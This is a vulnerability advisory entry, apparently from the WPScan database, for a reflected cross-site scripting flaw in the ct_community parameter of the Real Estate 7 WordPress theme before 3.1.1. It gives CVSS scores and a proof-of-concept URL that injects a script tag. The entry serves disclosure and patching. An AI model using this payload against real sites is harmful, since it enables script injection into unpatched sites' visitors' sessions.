Lucene search

Ex.MiWPVDB-ID:27264F30-71D5-4D2B-8F36-4009A2BE6745

HistoryJun 10, 2021 - 12:00 a.m.

Real Estate 7 < 3.1.1 - Reflected Cross-Site Scripting (XSS)

2021-06-1000:00:00

Ex.Mi

wpscan.com

6.1 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

4.3 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

JSON

The theme did not properly sanitise the ct_community parameter in its search listing page before outputting it back in it, leading to a reflected Cross-Site Scripting which can be triggered in both unauthenticated or authenticated user context

PoC

https://example.com/?ct_mobile_keyword&ct;_keyword&ct;_city&ct;_zipcode&search-listings;=true&ct;_price_from&ct;_price_to&ct;_beds_plus&ct;_baths_plus&ct;_sqft_from&ct;_sqft_to&ct;_lotsize_from&ct;_lotsize_to&ct;_year_from&ct;_year_to&ct;_community=<script>alert(document.domain);</script>&ct;_mls=&ct;_brokerage=0&lat;&lng;

CPENameOperatorVersion
realestate-7lt3.1.1

CPE	Name	Operator	Version
	realestate-7	lt	3.1.1

References

contempothemes.com/wp-real-estate-7/changelog/

6.1 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

4.3 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

JSON

Related for WPVDB-ID:27264F30-71D5-4D2B-8F36-4009A2BE6745